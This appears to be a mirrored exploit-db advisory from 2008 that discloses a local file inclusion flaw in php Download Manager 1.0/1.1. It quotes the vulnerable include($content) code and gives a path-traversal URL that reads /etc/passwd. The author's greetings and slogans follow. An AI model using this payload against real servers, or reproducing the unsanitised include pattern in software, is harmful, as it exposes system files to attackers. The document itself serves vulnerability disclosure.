exploit-db-mirror/platforms/php/webapps/5183.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

35 lines
935 B
Text
Executable file
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#####################################################
# Author : BeyazKurt
# Contact : Bey4zKurt@Gmail.Com
#
# Script : php Download Manager (v1.1 & 1.0)
# Risk : Local File Include
# Download : http://sourceforge.net/project/showfiles.php?group_id=185482
#
# File : include/body.inc.php
#
# Code :
# <?php
# if (file_exists($content)) {
# include($content);
# } else { echo "<p>This page has no content.</p>"; }
# ?>
#
# Exploit :
#
# Vuln.Com/include/body.inc.php?content=../../etc/passwd
#
#----------------------------
#
# INDEPENDENT KOSOVA (H)
# ARNAVUT Olmak Ayrıcalıktır - Being An ALBANIAN Is A Priviledge
#
# 15 Sehidimizin ruhu saad olsun...
#
# Www.Netkabus.Com
#
# Not : I Love You Gulsum (F)
# Thnx : Ekin0x - Fotosopar seni :D
#####################################################
# milw0rm.com [2008-02-24]